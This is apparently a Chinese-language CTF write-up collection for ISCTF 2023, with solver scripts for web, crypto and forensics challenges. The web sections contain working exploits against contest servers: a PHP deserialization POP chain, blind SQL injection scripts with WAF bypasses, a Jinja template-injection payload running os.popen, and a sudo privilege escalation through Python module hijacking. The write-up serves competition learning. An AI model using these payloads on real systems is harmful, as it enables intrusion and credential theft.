学一年了还在入门(
ISCTF{41631519-1c64-40f6-8dbb-27877a184e74}
// highlight_file(__FILE__);
// error_reporting(0);
class artifact{
public $excalibuer;
public $arrow;
public function __toString(){
echo "为Saber选择了对的武器!
";
return $this->excalibuer->arrow;
}
}
class prepare{
public $release;
public function __get($key){
$functioin = $this->release;
echo "蓄力!咖喱棒!!
";
return $functioin();
}
}
class saber{
public $weapon;
public function __invoke(){
echo "胜利!
";
include($this->weapon);
}
}
class summon{
public $Saber;
public $Rider;
public function __wakeup(){
echo "开始召唤从者!
";
echo $this->Saber;
}
}
$S = new summon();
$A = new artifact();
$P = new prepare();
$SABER = new saber();
$S -> Saber = $A;
$A -> excalibuer = $P;
$P -> release = $SABER;
$SABER -> weapon = "php://filter/convert.base64-encode/resource=flag.php";
echo serialize($S);
考点 md5强碰撞 变异传参 数组绕intval 回溯绕正则
import requests
data = {
'pan[gu': 'a'*1000000 + '2023ISCTF'
}
res = requests.post('http://43.249.195.138:20804?hongmeng=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&shennong=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2&zhurong[]=1',
data=data, allow_redirects=False)
print(res.text)
尝试admin admin登录 提示用户admin登录成功
那么应该是盲注
注入点在username
部分关键字会被替换为空 用双写绕过
import requests
import string
dictionary = string.digits+string.ascii_letters+"-{,}"
url = "http://43.249.195.138:22469/check.php"
xxx = ""
for i in range(1, 666):
print("正在爆破第{}位".format(i))
for j in dictionary:
flag = True
# payload = "admin'anandd/**/substr(database(),{},1)=binary'{}'%23".format(i,j)
# payload = "admin'anandd/**/substr(version(),{},1)=binary'{}'%23".format(i, j)
# payload = "admin'anandd/**/substr((seleselectct/**/group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema/**/=/**/'users'),{},1)='{}'#".format(i, j)
# payload = "admin'anandd/**/substr((seleselectct/**/group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_schema/**/=/**/'users'),{},1)='{}'#".format(i, j)
# payload = "admin'anandd/**/substr((seleselectct/**/group_concat(user)/**/from/**/users.users),{},1)='{}'#".format(i, j)
payload = "admin'anandd/**/substr((seleselectct/**/group_concat(passwoorrd)/**/from/**/users),{},1)='{}'#".format(i, j)
data = {'username': payload,"password":"admin"}
res = requests.post(url=url, data=data)
# print(res.text)
# exit(0)
if ('用户$admin$登录成功' in res.text):
xxx += j
print(xxx)
flag = False
break
if (flag):
print("final:\n{}".format(xxx))
break
# users 库
# users 表
# uesr password
# admin,guest,flag
# 手动改大写
在robots.txt中存在here_is_a_sercet.php
其中存在waf的源码
通过js目录下的rc4解密
const SM4 = require("gm-crypt").sm4;
var payload = "762V08zk+xrmKxIFrdJIJj6ULvI8Lc0pX39LjDyIUb0eAGkZe4KQa87TJXuqnFw0u/669wWRsqYFya812FtULw9+tpiGlaH2gleDfDKzr+g=";
let sm4Config = {
key: "B6*40.2_C9#e4$E3",
mode: "ecb",
cipherType: "base64"
};
let sm4 = new SM4(sm4Config);
var result = sm4.decrypt(payload);
console.log("解密:" + result)
/union|=|+|sleep|benchmark|for|where|sys|innodb|is|null|like|/*|*//i
万能密码拿到hint
没用
那就盲注
得到表为 bthcls
然后已知for sys innodb 都被ban了 一直在考虑怎么绕过
觉得题目给的secret.php后端waf可能是php写的 也尝试了回溯绕正则
失败
这时候想起来题目给了两个文本 应该分别对应的表和列
import requests
import string
dictionary = string.digits+string.ascii_letters+"-{,}"
url = "http://43.249.195.138:22431"
proxy = {"http":"127.0.0.1:8800"}
# def prove():
# f1 = open("D:\Desktop\\blind_injection\some name1.txt", "r")
# tables = f1.readlines()
# f2 = open("D:\Desktop\\blind_injection\some name2.txt", "r")
# columns = f2.readlines()
# f1.close()
# f2.close()
# for table in tables:
# for column in columns:
# payload = "a'or ascii(substr((select group_concat({}) from {}),1,1)) > 0#".format(
# column.strip(), table.strip()).replace(" ", " ")
# data = {'username': payload, "password": "a"}
# res = requests.post(url=url, data=data)
# if ('You are so smart! Let me give you a hint ↓ 5aSn5L2s77yM5L2g6L+Z5LmI6IGq5piO5bqU6K+l5LiN6ZyA6KaBaGludOWQpz8=' in res.text):
# print("{}{}".format(column,table))
# exit("found!")
# password users
xxx = ""
for i in range(1, 666):
print("正在爆破第{}位".format(i))
for j in dictionary:
flag = True
# payload = "a' or substr(database(),{},1) regexp '{}'#".format(
# i, j).replace(" ", " ")
# payload = "a'or substr(version(),{},1) regexp '{}'#".format(
# i, j).replace(" ", " ")
payload = "a'or substr((select group_concat(password) from users),{},1) regexp '{}'#".format(
i, j).replace(" ", " ")
data = {'username': payload, "password": "a"}
res = requests.post(url=url, data=data)
if ('You are so smart! Let me give you a hint ↓ 5aSn5L2s77yM5L2g6L+Z5LmI6IGq5piO5bqU6K+l5LiN6ZyA6KaBaGludOWQpz8=' in res.text):
xxx += j
print(xxx)
flag = False
break
if (flag):
print("final:\n{}".format(xxx))
break
# prove()
# bthcls 库
# users 表
# password 列
然后登录
存在index.bak
手测两位 猜测是mihoyo
fuzz后发现保留了
[0-9a-zA-Z]
和 - . / : { | } [ ]
| 保留了 所以可以命令注入
这里的马要求b64后结尾无特殊符号 手动调一下马的格式就行
然后读文件
{{url_for.__globals__.__builtins__['__import__']('os').popen('env').read()}}
没waf貌似
但是读了waf.py发现还是有黑名单的 不知道是不是没挂上
注意到只有三个字符串
你说爱我
尊嘟
假嘟
给他替换成Ook. Ook! Ook?
解得
ild3l4pXejwPcCwJsPAOq7sJczdRdTsJcCEUsP1Z
换表的b64 解码得ISCTF{9832h-s92hw-23u7w-2j8s0}
n 8185位
e 512位
p 1024位
尝试对n开根 发现是可以开完的
一直开8次都能开完
说明n = p^8
from Crypto.Util.number import *
import gmpy2
e=8401285423075497989963572888601376313375827722858883767564499066473101615084214973041844878664837606157257039358849583049856161628241418012475432529735909
n=4321524416983780646994834778612486851863709339970595612409550086067211224407144019110798099401660010305645681548980160563216101786447875231976835115531375372678886339587480251211072894186558627897353793098608766868067029578667171419890150599640781594755080391489447462042167529203389236065727274166091741227068469987681083794139925327545810024038937132463518225611578727737940746784891867532498184642892826569777559107609493212332054559366409007685504768163376250281644004067745087899653778023414105973047620041288118404657934689253192043728590231618132716567084621670074256312939305265244486145758609971249077639085204680923108132415216543541472534580414274250979940330459551536830268428508217821060604260805109071534457808355664329902779603050878055690772430842865701249378096775899778255848773171108341331128673249899037133851535556515961699925809139476576825524135111237249709241579903807179252011010794867269715170739895392375920757559721516050680666658719990497863646989338960261844762127142439486275294670858114079687572243312184222126710967744971775585723045524467708387051034760208768956889939050498139189352842087278125173957182804116052402778416216669522309692266036094371308166663738284209615212016564171075874421472070422416318901926525719485991792111414333398004433143751908199358861514725313334333703539239414806773743941986164981642517673117412666430463318509571757766510835600758060976848374353352239044908034501477295696684294816091801944163877509558909040753907584672390823893991672246726026216973013330313971007514064831801564703364591696610900089228302936595848024616691878437618798864186634802647568239526771151323609650598156701595265876736712670677452013054393336294483452480213271032488201259990782289047132105989846972462094302132564809025802421057537091870932014884606863807260521123084423689494401900014232257381801590783735595575258160274248494498550583673688754220860142413631521279464318987425447302135444093663034598455694901199312497459228254746451233078954904159983269585883146959928222698672413648364391121696092287848931565798557217897678221379451042304811449415982434055522599829843482810025780349284547491767219221510351411192251236517341826619338084348136539121415210345488359563985046136632077665460793346345051213014836088333266911684271237227766588616771431226302155269893547077232087387411935345207081799500649921586279416751311277417949192360648342427657867424947189027886922112452681434778850977010752230391327878892161
c=1319666577538961333645698288755316431847498788803191213042970951363587036899021668814931340784440773619019635330248746606532233949080268712626456845590851812018539646705520729734738948568349756255640832936325965096602018372418260009779997764653043892043725224481361578258532294625476542003357969893609762981355267857532927948279737945466285738730414948695579002627741734690862181161919734547857550654813379550806374778412603233570494684223057004866601064851006909940259029023083838730497564657690493780040030061594915385886594845808342023634855913932575150487723897981518504381563064479784253539091893925934095008385592529031453149337783826491324308222762190756839839091742536583068791632135883271750510776330897598323339568926234205068941397524390446254057404779041850572848212437589629794980799894974937730065394307284096622814438575278571743516485062058882794531407454597341604166586040406867868323002258035737328450923576878935675998377134860357842547595516243737449809845708319003744144753130977649201725370898918939022097783844477196723482879094829249203949784703408369396219233552019108990900029123063369670129291960293576115301371071209198455299007327352602249399500334424934488528506773472420414119617828578424633182320749576697196936762283306228974126242434663703609495003656244194067493769815032134577138807799395279843708630774412341952691146906264694889245375545635688534662371202213660012977431598746482601668122679279419039288257069843297770840263002870206849857995148396439717143553611140228607531647245352254251824086797704561756363448681983654454393569932173970943157225527780067126895832370645456372127507057750232257828579628856504832975775855059816283684123444984393171125206440588627925736223222718784319209561804023835238526792966229582251575475514349566824846911411659740321154272534589694497411065971714157409318007179403833025337349924938487211920583780456897879801099476865645416182025930390267064170271613760577949655548949317295792361772032185463678410983568470647837758657058230086368185901572658482084202212103405161775243930901117532775865963215971025744893777631306256061896284125630451368067313753222195227231131526000755922331413457862253392530308284156400411897252674398583100198330007779643967156773216464341590817951828849769679134515304258819218015083183653130972243262400248230445031327719507314015062447355358100770763425336581258193908638241498461735819218673116282476452340137513156421147748432605954889277898079292196216
p = (gmpy2.iroot(n,8)[0])
phi = p**7 * (p-1)
d = gmpy2.invert(e,phi)
print(long_to_bytes(pow(c,d,n)))
import gmpy2
p=86730239
q=14213789
e=65537
print(gmpy2.invert(e,(p-1)*(q-1)))
import gmpy2
from Crypto.Util.number import *
p=148918429211833931311377232986584938973743059073212599839623115665427914895645669183501178576150391744289581460816605746502214931778341477867351155596387652933495781711254282883751261939677404090197147081656181788591929669163136868218964709293920125621540609400422868787905644587832972557912408715930323376627
q=171038402266367256939123936702748804595437315282132849911066814500139712498763515340679622167260249888545143330007405802982392847190278920693250460850524633520975831749286968589871651025162017261096713799932261700764271950050347067565161191962564685771230794171949764436266574441764839874488376032231549892729
e=65537
c=14851493117751729314786395590288851716359993587230817853630888106953736856046237283262458768943755928276114968455892230282415271874575102191848094467483072917406023563216365448317356224168547471575514703164457734782926340881270452909703833791596549989295859769700115957204387979364759151189412041661372232990709426700356130619157951306602124832829643934472455951505172648145342937402994245253247196676517368660145618930947580047826592385805422897667170848124234255930751616877489527111466935276096332430156997438276378838842292858233866402475094148461288467628876155587524351026609368358477501337216881543486822532627
d = gmpy2.invert(e,(p-1)*(q-1))
print(long_to_bytes(pow(c,d,q*p)))
嘤嘤?换.
嘤嘤嘤 换-
解码摩斯
这题考信息收集(
参考
https://r98inver.github.io/posts/teamitaly-bigrsa/
https://7rocky.github.io/en/ctf/imaginaryctf/pqqp/
https://blog.maple3142.net/2023/10/09/balsn-ctf-2023-writeups/#prime
https://7rocky.github.io/en/ctf/other/balsn-ctf/prime/#
生成相关素数
rs = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97]
P = prod(rs)
res = []
for k in range(2,2**6):
a = 6 * k + 1
b = 12 * k + 1
c = 18 * k + 1
if is_pseudoprime(a) and is_pseudoprime(b) and is_pseudoprime(c):
n = a * b * c
res.append(n)
print(res)
from Crypto.Util.number import *
from sympy import factorial
from gmpy2 import gcd
import gmpy2
n = 11947241219140615237486309604628973391930339499486798714294498785973885463922548820705069266901903036359254530976927762175262118185159625298369758973935607721381080656199430417818042316007700805008489750740972102287526203064312544340176751751266738219862839022892152635044837041435349904947659346174437695051460882295109851494351994498403791853684239883961766735230202016890875913906900424655711952381425165331389205409282026144667620577946333963601349932905443037145145394667138672752796990411249984169798953060016353748467221154507518574580014882822860853751863757579945329482337792853278715658322366578632817369803
leak = 4825516411405566882589539973300777582630401687252523937619475044718073214792109569356301252345907914527064817796240727881691399437316660502564323688151311441558823720142071322647007043253626474853010585775710666373651910201889816367922377400970334479040370865879692204764210349607801862666059991789964453439198722962928173197103040385999540054988070333338229570681105393323319767364566644771731595597298210924296456293443125736685469259629163687986114207231233692023613120260155832741199446052855856512791809968963821161765216500389495853488545132008219841635172896843241988125093920217328861507191614658581776695350233593334984646128341640512614300048002219790302478025661133721688232990437685571940604588227022076092857294647830142309441330515812342199940466483115991318018705011472671758063610572930560763516803732693572940939851140384123593105367117155740563057395940645038058194280259524467405820813428765139386968927021061208348111646257434870000866555555283176852834141906387086839051793789126474095527358879630274092172435022326207193319806666865704778907868548658370890623182731938070419969709739233504224100413506514936517272134494776127809327563935813198793891897000404156963455000732616317276241867836699641699825594195079194154957636030485909612033254350828892222046169586844737908349421869385194421981553067305581842171364022745759111602699744161574724372962242132415149146766136601016174658042678857388889036814591399168640678928083442174651493660991088328784105160030857387096251561933704301600695757426945716557961698202485226605485682131045560193822624290720243852434254301324766198129736640005205530445739302632191151740246117208267182630330046600955724262084795763080838384593939971523865769318326101179866187596006185138294477350533316908592086441208575935282494961976691089358976722199557082176285926812134290542838960814502829473372780200310674359645482281037654052483716329497333729594792122297988611883754886634452292313599416610842690057657285337854049766320641249317238780428383587602425132767334811708075065922641191109650660427678019567095309270443930385437292172296652003394183918270707887845018685247162812541929998945735270109736669595830167257239265204520272132384023622231518288514767919183916561550558812478144292894132331163501566746036390319663066054892756826660841952717280005731719082266616429646501565960817772663658546555336959754321712751857740551378987853931613973604348308746819562341219749677392565068390386908064199536445684309718116754288299091975226013592388160308117145043236992250577771659408413506586402897189336742792418163003231783947003853396754144599319566763313339145462208172531322682800226151072022731913191728047323245146556315571396082728252085753230639541374982105041248659074695696205654079837224195868428271353983820725017250413714060967825638577327604252122887136259380946072629481202720339169708229866846597577227829317443910036825722430374711816074735238082313198164126791797947010044130222158124667234003098164746100341636238823175289796896896408971518797835906067939914494546110471749352544064300485882179448030898818405400902242119590645639910708635188342567159795613212660990908765619684401061336405049960091659288716162966504703741105477420409053115823924764680153604215949521605456710353305498258615912458036292507652321420277318757146737030628878096962452278346772976364597137682209395761868224382621093921689415088745975049380393255899867417274843474628482169247388041616142896804170033688742622605192409970919836724035274730923747265191248135577704760607590
c = 4058526944014006069084945174812818814825704864122299028618329411106188952604728150732223145114766938864644072527523082946069975859381918224872075058517683896020489424720005770218969436595364473179601299857281520204212872074837132357469599147175121200219338329188718982224238281009625352190581095607599976922610436817213692622671732783554216636941121695116377777616027462234472833366922829073660312229117800995468022619934881890343086653577149166193139948443894324239522101581089953817527886638425552917578146958961373353776642091545344162923084513872918786615317499139918810812014781753970806739855831453833956364967
def factor(n, t):
for _ in range(10):
for b in range(1, 100, 2):
num = pow(b, t, n)
if gcd(num-1, n) not in [1, n]:
return gcd(num-1, n)
return False
def get_k_y():
y = 0
for k in range(800, 1500):
fact = factorial(k)
y_ed = (leak - k) // fact
y = gcd(int(y_ed), int(leak - k))
if y > (1 << 100) and y.bit_length() <= 1280:
print(f'{k = } {y = }')
break
return k,y
k,y = get_k_y()
# e = gmpy2.iroot(int(((leak-k)//y) % factorial(k)), 2)[0]
# tem = int((leak-k)//y)
# kphi = (tem-e**2) // factorial(k)
# phi_ = kphi
# while phi_ % 2 == 0:
# phi_ = phi_//2
# p = factor(int(n), int(phi_))
# if p:
# print('found!')
# print(p)
# break
# 109147047401610068589196117668478678573425640467855721459792193588022086523216277422282084972626038309107642247231426126118154349890627263786908440994518759632567543350240699529434894837492043098560661823088926312187833910086403576147831906252128915891099450787538630572210256420615161408120096393238146759283
p = 109147047401610068589196117668478678573425640467855721459792193588022086523216277422282084972626038309107642247231426126118154349890627263786908440994518759632567543350240699529434894837492043098560661823088926312187833910086403576147831906252128915891099450787538630572210256420615161408120096393238146759283
q = n // p
phi = (p-1)*(q-1)
e = 65537
d = gmpy2.invert(e,phi)
print(long_to_bytes(pow(c,d,n)).decode(),end="")
from sympy import *
from functools import reduce
from Crypto.Util.number import *
import gmpy2
from gmpy2 import is_prime as is_strongPrime
n=138222025039224144545251830624229986468723531196582463907557734108529994926504669875900898789473948111199016914847829105939167293515822413866727879262875702026534563930475309506834431656926222982363543666448736091756871792887144283877167509418070979449484508499296324616988840431116233637168977730122017878289
leak1=23535059927033628406212169278224758389583882623183004031205822980722154537430761635153622180505243837027568034322858038302626132200979370182327110682738910
leak2 = [362437850887271063413256292444148642949623196635276044583204094265607936120337004605360832421011, 1932915843524327487337992118762711929552569713433223514001673251237692307587356544615955431611435994003602897830069566867051943572065473955405337889221398, 11222178024143398739150445814520244630341642052876364179793404105841311693968292227072031763726153574031884490677131749512430325919668649359617953965112844, 5408933876805830533113961512210040977462510675785228477646978801328722923647434079128879371684477664804744431834418916837956820965870203842552250165916773, 1447143741705069323823257922715038721270982554690635708441585728089036094805730054505696492295730683300002193478561819037345041940787115528445592303142510, 3707657531268843465369646969917923274507341341483950204025637357600814449263032574496424566705812439915548150679438579110456264431525526309588664326456861, 9263925820149827740182684692442727161206242182976684575667062235695526783971703826794731732152445051579616121306722939129265340347908823003172137299057843, 207494591333501391015462321304802957885928775185602834554977737560856036337667840127810136802887548047878444936730742505483927963807357904024967768148122, 7052936859446617933917872361389151092893299250603966165472023802877016733939957851026719428770748111897050866474067880613419756475700748999497496482278608, 1169538791889404037461397919075674424569430764451305755000680272926397357803359328850780774937432248011264334398346178303234064891680342161511829008635621]
final = [2268617516274900905319941795987877533673889507146326516564545408684476960310333170888941124460992562245780101836116975666368936099249664924148379487909122, 1445275952377746701088629016221431744592935398639655895336779954310077866709012082302847692239730041591520169244063854849129773530127510048494782550102381, 7]
phi = n - (leak1%n) + 1
e = 0x10001
d = gmpy2.invert(e, phi)
def is_prime(p):
check = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37,
41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97]
return all([pow(i, p-1, p) == 1 for i in check])
def cal_key():
for key in range(10**9, 2,-1):
if (is_prime(key) and not is_strongPrime(key)):
print(key)
return key
def crack_unknown_increment(states, modulus, multiplier):
increment = (states[1] - states[0]*multiplier) % modulus
return modulus, multiplier, increment
def crack_unknown_multiplier(states, modulus):
multiplier = (states[2] - states[1]) * \
inverse(states[1] - states[0], modulus) % modulus
return crack_unknown_increment(states, modulus, multiplier)
def crack_unknown_modulus(states):
diffs = [s1 - s0 for s0, s1 in zip(states, states[1:])]
zeroes = [t2*t0 - t1*t1 for t0, t1, t2 in zip(diffs, diffs[1:], diffs[2:])]
modulus = abs(reduce(gcd, zeroes))
factors = factorint(modulus)
while not isprime(modulus): # 注意这里N刚开始有可能不是素数导致后面无法求出逆元
for prime, order in factors.items():
if prime.bit_length() > 128:
continue
modulus = modulus / prime**order
multiplier = (states[2] - states[1]) * \
inverse(states[1] - states[0], modulus) % modulus
increment = (states[1] - states[0]*multiplier) % modulus
seed = ((states[0] - increment) * invert(multiplier, modulus) % modulus)
return modulus, multiplier, increment, seed
modulus, multiplier, increment, seed = crack_unknown_modulus(leak2)
for i in range(11):
seed = (seed * multiplier + increment) % modulus
for key in [294409, 56052361, 118901521, 172947529, 216821881, 228842209]:
base = seed ^ key
c = 0
times = 0
for i in final:
c += i * base ** times
times += 1
res = long_to_bytes(pow(c, d, n))
try:
print(res.decode())
except:
pass
import gmpy2
from Crypto.Util.number import *
c = 29897791365314067508830838449733707533227957127276785142837008063510003132596050393885548439564070678838696563164574990811756434599732001622138564176327233154381380717648392357672642893142367607369679906940371540867456654151408884171467638060523066406441697453971996011548195499549200103123841556085936672833238264876038160712793697159776332101536779874757463509294968879216810485825310481778472384531442206034564488532399171243463881900578407746982324779260941957792455217641883334131366614310644607114128868153897806362954456585661855569432513785225453501792356175649676419772626548071916379318631677869452985829916084336045071072493567871623113923140668031380684940109024609167449291380675124701557542736834722898328082888430566229322840781411336263268594978558564310744076581639469210462567543585251718744340216155557606004995449505782302864725856877289388008819135023371948017425832082773421030256964953984562211638060
N = 3231913372897424708803097969843687520868057190788284975066875241636436021279559026753076528399891936983240045179193386905918743759145596242896507856007669217275515235051689758768735530529408948098860529277921046146065473333357110158008648799207873976745048714516868561754202543130629713461365314627535982379718931633528922076268531363809414255082933615667770491818402126891370106045838695484124212397783571579791558324350069782623908757815983802849109451590357380624488436968737140312471089662428308113246310588336044438265822574558816510054763215983649467009345458480077882624118620789015758507736272402998721366662352794082495441303895025585316667229865533166614969641012195668280586477033200418153345241668242651407009849656745509386158276185301334443855737552801531617549980843398648751032649895403939319648954908487619711555700124294191702406981128355348449748466449951568451135718146828444185238617155432417897711198169
d = 220908195398117048628110042133057032501548264225985823161565460390793825899523662424732910718579350524590368287207857059670558852106434615134645183432670023784725430385048028248108677670095524205518013647694485975996499747580966911259433184798952372110628624294686853944766950244209186984164963987120416687012811346656498861438432610431705868541829977481875385468143747334359481673214618931159403123892213161430602430294790913847722073762999311674428134241956293914716183107414340330449465142849402354034926378025006749405210014879947411570380433942279355488861684317611066949685697268714760755591128598654573304969
pq = gmpy2.gcd(pow(2, d*N, N)-2, N)
m = pow(c, d, pq)
print(long_to_bytes(m))
p1 p2 接近
连分数逼近得到q1 q2
from Crypto.Util.number import *
import gmpy2
c = 10514867898770499427284608506159580569755258729683776720082395249877529851029152305989048383470182992945743997295638334301128554841767619528809377736651238576700664675871769469687466885347209033023021132575700436470105289467423655742323143373578268184141573237433927498143740155552829633601489926767185335051352605346248971754473960051955670785777007641909166041398566067524811394639822575661469340152913706417365065683835945980239268665146900957692685590242386540944646586739158427428484471978559453954674292300496568823382513505511940062159025700312492163454304120916055466108498000990408937265075788135466153131436
N1 = 29306627985861300819651846356448043523015086509329909246911330574896611830331438353458702041787309531570626136669100576501108581024502570212983369979387658041578384466200573362881060761873478590684611265249166591510948597798713864127744488747451815919677861684787135464097885906630772472111899455047125676738720391327331161464894360886214160668909531050207033060523194208723151015702926842472554933849380343375654696115359960495727909221926251630408376527033291123026893207722440649867394971680316008434251667567174806214522621693042164997381729300075394393372808917061813346794422821819494227772694592990703688149467
N2 = 18405525902524887428651801489049128242565457677879715229456940729064725933277139190670749899959483734341103740185991771024797037242681566772189045321838652668819112989587974866361063424698215713773139281840970499871668796770682692589505769008516630604297570518689639885716307469568821629424402742264467677407820449195383921766157185602677665872353099155904715047452319853202981674101731121033360393547940246101864940155160699277417096395998766928213545196492031975135121409309520198853066288180944871441224241681478164494169741263236267316380581883196836731872676312125837497320438964940186318916950049777255612191899
e = 65537
def continuedFra(x, y):
cF = []
while y:
cF += [x // y]
x, y = y, x % y
return cF
def Simplify(ctnf):
numerator = 0
denominator = 1
for x in ctnf[::-1]:
numerator, denominator = denominator, x * denominator + numerator
return (numerator, denominator)
def getit(c):
cf = []
for i in range(1, len(c)):
cf.append(Simplify(c[:i]))
return cf
def attack(e, n):
cf = continuedFra(e, n)
for (p2, p1) in getit(cf):
if p1 == 0:
continue
if N1 % p1 == 0 and p1 != 1:
return p1, p2
print('not find!')
q1, q2 = attack(N1, N2)
p1 = N1 // q1
print(GCD(N1,p1))
d = gmpy2.invert(e,(p1-1)*(q1-1))
print(long_to_bytes(pow(c,d,N1)))
from Crypto.Util.number import *
from Crypto.Cipher import AES
import os
c = b'bsF\xb6m\xcf\x94\x9fg1\xfaxG\xd4\xa3\x04\xfb\x9c\xac\xed\xbe\xc4\xc0\xb5\x899|u\xbf9e\xe0\xa6\xdb5\xa8x\x84\x95(\xc6\x18\xfe\x07\x88\x02\xe1v'
hint = 0x47405a4847405a48470000021a0f2870
# padding 9 个 tab + 已知明文 ISCTF{ 6个 爆破剩余一个 得到key
# b'\t\t\t\t\t\t\t\t\tp047405a48asdeqa48470000021a0f287098asn'
m = b'\t\t\t\t\t\t\t\t\tISCTF{'
i = 1
tem = m + chr(i).encode()
res = bytes_to_long(tem) ^ (hint)
message = long_to_bytes(res)
# 通过观察特征猜测最后一位也为A
# NISANISANISANISA
key = b'NISANISANISANISA'
cipher = AES.new(key, AES.MODE_ECB)
iv = os.urandom(16)
aes = AES.new(key, AES.MODE_CBC, iv=iv)
res = aes.decrypt(c)
print(res)
# b106cea3fb848e7bea310c9851f15c1}
# ISCTF{
# 拼接起来还差一位 爆破一下就行
foremost抽出第二张猫
没啥用stegsolver发现里面还有张图
是社会主义核心价值观
结合原图左上角的坐标
查表即可
table = [["富强","自由","爱国"],["民主","平等","敬业"],["文明","公正","诚信"],["和谐","法治","友善"]]
print(len(table))
points = [(3, 2), (3, 2), (3, 2), (3, 3), (3, 1), (3, 2), (2, 1),
(3, 2), (4, 2), (4, 2), (3, 3), (2, 1), (3, 2), (2, 1),
(3, 2), (4, 1), (3, 2), (2, 1), (4, 1), (2, 1), (4, 1),
(2, 3), (4, 1), (2, 2), (3, 2), (3, 2), (3, 2), (1, 2),
(4, 1), (4, 1), (3, 2), (1, 2), (4, 1), (1, 1), (3, 2),
(3, 2), (4, 1), (3, 1), (4, 1), (4, 1), (4, 1), (2, 3),
(4, 1), (3, 1), (4, 1), (2, 2), (4, 1), (1, 2), (4, 1),
(1, 3), (3, 2), (1, 2), (4, 1), (1, 1), (4, 1), (3, 1),
(4, 1), (2, 3), (4, 1), (4, 2), (4, 1), (3, 2), (4, 1),
(4, 2), (3, 2), (1, 2), (3, 2), (3, 1), (3, 2), (3, 2),
(4, 1), (4, 2), (4, 1), (3, 2), (4, 1), (3, 2), (4, 2),
(4, 3), (4, 2)]
res = ''
for point in points:
x,y = point
res += table[x-1][y-1]
print(res)
反编译后jadx打开 发现是unity小游戏
在manage下没有找到assembly-csharp.dll
于是去lib下找libil2cpp.so
通过Il2CppDumper导出
再执行 srcipt file
-> ida_py3.py
-> script.json
进行函数关联
然后就没然后了 这不是逆向
回过头用010看看apk 搜flag
发现flag.zip的路径
考虑到下面的报错
是语法错误 猜测密码是SyntaxError
得到flag
binwalk 抽出pcap包
发现访问了login.jsp
解码得到flag
提交记得换前缀
复制进记事本 改字体大小为1发现类似二维码
然后复制颜色较深处数据 发现都是45678 那么将其替换为1 其余替换为0
然后转码扫码
with open("data.txt","r")as f:
data = f.read().replace("4","a").replace("5","a").replace("6","a").replace("7","a").replace("8","a")\
.replace("9","0").replace("0","0").replace("1","0").replace("2","0").replace("3","0").replace("a","1")
with open("res.txt","w")as f2:
f2.write(data)
伪加密
crc爆破宽高
flag.txt中的文件像aes rabbit这种的特征
解压得到密码
解aes得到flag
补png头
补文件头尾
然后扫码
tshark -r usb.pcapng -T fields -Y "bluetooth" -e btatt.value | sed '/^\s*$/d' > blue.txt
tshark读取蓝牙流量得到blue.txt,手动删除多余的01,03字符
knm提取usb流量得到usbdata.txt
脚本去除多余字符
usbdata = open(r"C:\Users\abc\Desktop\usbdata.txt",'r').read().split('\n')
for i in range(len(usbdata)):
data = usbdata[i][2:18]
print(data)
结果和blue.txt手动拼接
键盘流量脚本得到明文
normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"" ,"29":"" ,"2a":"", "2b":"\t","2c":"" ,"2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"" ,"33":";","34":"'","35":"" ,"36":",","37":".","38":"/","39":"" ,"3a":"" ,"3b":"" , "3c":"" ,"3d":"" ,"3e":"" ,"3f":"" ,"40":"" ,"41":"" ,"42":"" ,"43":"" ,"44":"" ,"45":"" }
shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"" ,"29":"" ,"2a":"", "2b":"\t","2c":"" ,"2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"" ,"33":"\"","34":":","35":"" ,"36":"<","37":">","38":"?","39":"" ,"3a":"" ,"3b":"" , "3c":"" ,"3d":"" ,"3e":"" ,"3f":"" ,"40":"" ,"41":"" ,"42":"" ,"43":"" ,"44":"" ,"45":"" }
nums = []
keys = open(r"C:\Users\abc\Desktop\blue.txt")
for line in keys:
if len(line)!=17: #首先过滤掉鼠标等其他设备的USB流量
continue
nums.append(line[0:2]+line[4:6]) #取一、三字节
keys.close()
output = ""
for n in nums:
if n[2:4] == "00" :
continue
if n[2:4] in normalKeys:
if n[0:2]=="02": #表示按下了shift
output += shiftKeys [n[2:4]]
else :
output += normalKeys [n[2:4]]
else:
output += ''
print('output :' + output)
output :aggsz{kp_wn_yrv_sosov_jemzusfyffjs!!b!}
-> 大写 -> 删除
删除的内容“soezusb"为key,剩余"Aggsz{Kp_wn_YRV_sov_jmfyffjs!!!}”为明文维吉尼亚解密
得到flag:Isctf{So_ez_USB_and_vigenere!!!}
需要提权 sudo-l
web.py内无参数可控
但是import了 webbrowser.py
我们在同目录写一个 webbrowser.py
import os
def open(url):
res = os.popen("./flag").read()
print(res)
然后sudo执行
part1 crc爆破宽高
part2
有个wbstego 没找到key 根据语义猜测easy
